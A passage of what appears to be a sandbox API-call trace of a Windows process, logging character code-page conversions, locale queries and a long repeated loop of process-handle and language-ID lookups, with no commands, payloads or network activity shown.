!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿºÀ\\E\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0067.807] GetLastError () returned 0x0 [0067.807] SetLastError (dwErrCode=0x0) [0067.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0067.808] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0067.808] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0067.808] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0067.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿºÀ\\E\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0067.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41bfdb) returned 0x0 [0067.808] RtlSizeHeap (HeapHandle=0x41c0000, Flags=0x0, MemoryPointer=0x41c2f18) returned 0x80 [0067.808] GetCurrentProcess () returned 0xffffffff [0067.809] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.809] GetSystemDefaultLangID () returned 0x25f0409 [0067.809] GetThreadLocale () returned 0x409 [0067.809] GetCurrentProcess () returned 0xffffffff [0067.809] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.809] GetSystemDefaultLangID () returned 0x25f0409 [0067.809] GetThreadLocale () returned 0x409 [0067.809] GetCurrentProcess () returned 0xffffffff [0067.809] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.809] GetSystemDefaultLangID () returned 0x25f0409 [0067.809] GetThreadLocale () returned 0x409 [0067.810] GetCurrentProcess () returned 0xffffffff [0067.810] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.810] GetSystemDefaultLangID () returned 0x25f0409 [0067.810] GetThreadLocale () returned 0x409 [0067.810] GetCurrentProcess () returned 0xffffffff [0067.810] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.810] GetSystemDefaultLangID () returned 0x25f0409 [0067.810] GetThreadLocale () returned 0x409 [0067.810] GetCurrentProcess () returned 0xffffffff [0067.810] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.810] GetSystemDefaultLangID () returned 0x25f0409 [0067.810] GetThreadLocale () returned 0x409 [0067.810] GetCurrentProcess () returned 0xffffffff [0067.810] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.810] GetSystemDefaultLangID () returned 0x25f0409 [0067.810] GetThreadLocale () returned 0x409 [0067.810] GetCurrentProcess () returned 0xffffffff [0067.810] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.810] GetSystemDefaultLangID () returned 0x25f0409 [0067.810] GetThreadLocale () returned 0x409 [0067.810] GetCurrentProcess () returned 0xffffffff [0067.810] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.810] GetSystemDefaultLangID () returned 0x25f0409 [0067.810] GetThreadLocale () returned 0x409 [0067.810] GetCurrentProcess () returned 0xffffffff [0067.810] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.810] GetSystemDefaultLangID () returned 0x25f0409 [0067.811] GetThreadLocale () returned 0x409 [0067.811] GetCurrentProcess () returned 0xffffffff [0067.811] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.811] GetSystemDefaultLangID () returned 0x25f0409 [0067.811] GetThreadLocale () returned 0x409 [0067.811] GetCurrentProcess () returned 0xffffffff [0067.811] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.811] GetSystemDefaultLangID () returned 0x25f0409 [0067.811] GetThreadLocale () returned 0x409 [0067.811] GetCurrentProcess () returned 0xffffffff [0067.811] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.811] GetSystemDefaultLangID () returned 0x25f0409 [0067.811] GetThreadLocale () returned 0x409 [0067.811] GetCurrentProcess () returned 0xffffffff [0067.811] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.811] GetSystemDefaultLangID () returned 0x25f0409 [0067.811] GetThreadLocale () returned 0x409 [0067.811] GetCurrentProcess () returned 0xffffffff [0067.811] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.811] GetSystemDefaultLangID () returned 0x25f0409 [0067.811] GetThreadLocale () returned 0x409 [0067.811] GetCurrentProcess () returned 0xffffffff [0067.811] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.811] GetSystemDefaultLangID () returned 0x25f0409 [0067.811] GetThreadLocale () returned 0x409 [0067.811] GetCurrentProcess () returned 0xffffffff [0067.811] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.812] GetSystemDefaultLangID () returned 0x25f0409 [0067.812] GetThreadLocale () returned 0x409 [0067.812] GetCurrentProcess () returned 0xffffffff [0067.812] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.812] GetSystemDefaultLangID () returned 0x25f0409 [0067.812] GetThreadLocale () returned 0x409 [0067.812] GetCurrentProcess () returned 0xffffffff [0067.812] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.812] GetSystemDefaultLangID () returned 0x25f0409 [0067.812] GetThreadLocale () returned 0x409 [0067.812] GetCurrentProcess () returned 0xffffffff [0067.812] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.812] GetSystemDefaultLangID () returned 0x25f0409 [0067.812] GetThreadLocale () returned 0x409 [0067.812] GetCurrentProcess () returned 0xffffffff [0067.812] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.812] GetSystemDefaultLangID () returned 0x25f0409 [0067.812] GetThreadLocale () returned 0x409 [0067.812] GetCurrentProcess () returned 0xffffffff [0067.812] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.812] GetSystemDefaultLangID () returned 0x25f0409 [0067.812] GetThreadLocale () returned 0x409 [0067.812] GetCurrentProcess () returned 0xffffffff [0067.812] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.812] GetSystemDefaultLangID () returned 0x25f0409 [0067.812] GetThreadLocale () returned 0x409 [0067.812] GetCurrentProcess () returned 0xffffffff [0067.812] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.813] GetSystemDefaultLangID () returned 0x25f0409 [0067.813] GetThreadLocale () returned 0x409 [0067.813] GetCurrentProcess () returned 0xffffffff [0067.813] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.813] GetSystemDefaultLangID () returned 0x25f0409 [0067.813] GetThreadLocale () returned 0x409 [0067.813] GetCurrentProcess () returned 0xffffffff [0067.813] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.813] GetSystemDefaultLangID () returned 0x25f0409 [0067.813] GetThreadLocale () returned 0x409 [0067.813] GetCurrentProcess () returned 0xffffffff [0067.813] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.813] GetSystemDefaultLangID () returned 0x25f0409 [0067.813] GetThreadLocale () returned 0x409 [0067.813] GetCurrentProcess () returned 0xffffffff [0067.813] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.813] GetSystemDefaultLangID () returned 0x25f0409 [0067.813] GetThreadLocale () returned 0x409 [0067.813] GetCurrentProcess () returned 0xffffffff [0067.813] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.813] GetSystemDefaultLangID () returned 0x25f0409 [0067.813] GetThreadLocale () returned 0x409 [0067.813] GetCurrentProcess () returned 0xffffffff [0067.813] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.813] GetSystemDefaultLangID () returned 0x25f0409 [0067.817] GetThreadLocale () returned 0x409 [0067.817] GetCurrentProcess () returned 0xffffffff [0067.817] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.817] GetSystemDefaultLangID () returned 0x25f0409 [0067.817] GetThreadLocale () returned 0x409 [0067.817] GetCurrentProcess () returned 0xffffffff [0067.817] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.817] GetSystemDefaultLangID () returned 0x25f0409 [0067.817] GetThreadLocale () returned 0x409 [0067.818] GetCurrentProcess () returned 0xffffffff [0067.818] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.818] GetSystemDefaultLangID () returned 0x25f0409 [0067.818] GetThreadLocale () returned 0x409 [0067.818] GetCurrentProcess () returned 0xffffffff [0067.818] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.818] GetSystemDefaultLangID () returned 0x25f0409 [0067.818] GetThreadLocale () returned 0x409 [0067.818] GetCurrentProcess () returned 0xffffffff [0067.818] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.818] GetSystemDefaultLangID () returned 0x25f0409 [0067.818] GetThreadLocale () returned 0x409 [0067.818] GetCurrentProcess () returned 0xffffffff [0067.818] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.818] GetSystemDefaultLangID () returned 0x25f0409 [0067.818] GetThreadLocale () returned 0x409 [0067.818] GetCurrentProcess () returned 0xffffffff [0067.818] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.818] GetSystemDefaultLangID () returned 0x25f0409 [0067.818] GetThreadLocale () returned 0x409 [0067.818] GetCurrentProcess () returned 0xffffffff [0067.818] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.818] GetSystemDefaultLangID () returned 0x25f0409 [0067.818] GetThreadLocale () returned 0x409 [0067.818] GetCurrentProcess () returned 0xffffffff [0067.818] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.818] GetSystemDefaultLangID () returned 0x25f0409 [0067.819] GetThreadLocale () returned 0x409 [0067.819] GetCurrentProcess () returned 0xffffffff [0067.819] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.819] GetSystemDefaultLangID () returned 0x25f0409 [0067.819] GetThreadLocale () returned 0x409 [0067.819] GetCurrentProcess () returned 0xffffffff [0067.819] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.819] GetSystemDefaultLangID () returned 0x25f0409 [0067.819] GetThreadLocale () returned 0x409 [0067.819] GetCurrentProcess () returned 0xffffffff [0067.819] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.819] GetSystemDefaultLangID () returned 0x25f0409 [0067.819] GetThreadLocale () returned 0x409 [0067.819] GetCurrentProcess () returned 0xffffffff [0067.819] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.819] GetSystemDefaultLangID () returned 0x25f0409 [0067.819] GetThreadLocale () returned 0x409 [0067.819] GetCurrentProcess () returned 0xffffffff [0067.819] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.819] GetSystemDefaultLangID () returned 0x25f0409 [0067.819] GetThreadLocale () returned 0x409 [0067.819] GetCurrentProcess () returned 0xffffffff [0067.819] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.819] GetSystemDefaultLangID () returned 0x25f0409 [0067.819] GetThreadLocale () returned 0x409 [0067.819] GetCurrentProcess () returned 0xffffffff [0067.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.820] GetSystemDefaultLangID () returned 0x25f0409 [0067.820] GetThreadLocale () returned 0x409 [0067.820] GetCurrentProcess () returned 0xffffffff [0067.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.820] GetSystemDefaultLangID () returned 0x25f0409 [0067.820] GetThreadLocale () returned 0x409 [0067.820] GetCurrentProcess () returned 0xffffffff [0067.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.820] GetSystemDefaultLangID () returned 0x25f0409 [0067.820] GetThreadLocale () returned 0x409 [0067.820] GetCurrentProcess () returned 0xffffffff [0067.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.820] GetSystemDefaultLangID () returned 0x25f0409 [0067.820] GetThreadLocale () returned 0x409 [0067.820] GetCurrentProcess () returned 0xffffffff [0067.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.820] GetSystemDefaultLangID () returned 0x25f0409 [0067.820] GetThreadLocale () returned 0x409 [0067.820] GetCurrentProcess () returned 0xffffffff [0067.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.820] GetSystemDefaultLangID () returned 0x25f0409 [0067.820] GetThreadLocale () returned 0x409 [0067.820] GetCurrentProcess () returned 0xffffffff [0067.820] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.820] GetSystemDefaultLangID () returned 0x25f0409 [0067.821] GetThreadLocale () returned 0x409 [0067.821] GetCurrentProcess () returned 0xffffffff [0067.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.821] GetSystemDefaultLangID () returned 0x25f0409 [0067.821] GetThreadLocale () returned 0x409 [0067.821] GetCurrentProcess () returned 0xffffffff [0067.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.821] GetSystemDefaultLangID () returned 0x25f0409 [0067.821] GetThreadLocale () returned 0x409 [0067.821] GetCurrentProcess () returned 0xffffffff [0067.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.821] GetSystemDefaultLangID () returned 0x25f0409 [0067.821] GetThreadLocale () returned 0x409 [0067.821] GetCurrentProcess () returned 0xffffffff [0067.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.821] GetSystemDefaultLangID () returned 0x25f0409 [0067.821] GetThreadLocale () returned 0x409 [0067.821] GetCurrentProcess () returned 0xffffffff [0067.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.821] GetSystemDefaultLangID () returned 0x25f0409 [0067.821] GetThreadLocale () returned 0x409 [0067.821] GetCurrentProcess () returned 0xffffffff [0067.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.821] GetSystemDefaultLangID () returned 0x25f0409 [0067.821] GetThreadLocale () returned 0x409 [0067.821] GetCurrentProcess () returned 0xffffffff [0067.821] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.822] GetSystemDefaultLangID () returned 0x25f0409 [0067.822] GetThreadLocale () returned 0x409 [0067.822] GetCurrentProcess () returned 0xffffffff [0067.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.822] GetSystemDefaultLangID () returned 0x25f0409 [0067.822] GetThreadLocale () returned 0x409 [0067.822] GetCurrentProcess () returned 0xffffffff [0067.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.822] GetSystemDefaultLangID () returned 0x25f0409 [0067.822] GetThreadLocale () returned 0x409 [0067.822] GetCurrentProcess () returned 0xffffffff [0067.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.822] GetSystemDefaultLangID () returned 0x25f0409 [0067.822] GetThreadLocale () returned 0x409 [0067.822] GetCurrentProcess () returned 0xffffffff [0067.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.822] GetSystemDefaultLangID () returned 0x25f0409 [0067.822] GetThreadLocale () returned 0x409 [0067.822] GetCurrentProcess () returned 0xffffffff [0067.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.822] GetSystemDefaultLangID () returned 0x25f0409 [0067.822] GetThreadLocale () returned 0x409 [0067.822] GetCurrentProcess () returned 0xffffffff [0067.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.822] GetSystemDefaultLangID () returned 0x25f0409 [0067.822] GetThreadLocale () returned 0x409 [0067.822] GetCurrentProcess () returned 0xffffffff [0067.822] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.823] GetSystemDefaultLangID () returned 0x25f0409 [0067.823] GetThreadLocale () returned 0x409 [0067.823] GetCurrentProcess () returned 0xffffffff [0067.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.823] GetSystemDefaultLangID () returned 0x25f0409 [0067.823] GetThreadLocale () returned 0x409 [0067.823] GetCurrentProcess () returned 0xffffffff [0067.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.823] GetSystemDefaultLangID () returned 0x25f0409 [0067.823] GetThreadLocale () returned 0x409 [0067.823] GetCurrentProcess () returned 0xffffffff [0067.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.823] GetSystemDefaultLangID () returned 0x25f0409 [0067.823] GetThreadLocale () returned 0x409 [0067.823] GetCurrentProcess () returned 0xffffffff [0067.823] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0067.823] GetSystemDefaultLangID () returned 0x25f0409 [0067.823] GetThreadLocale () returned 0x409 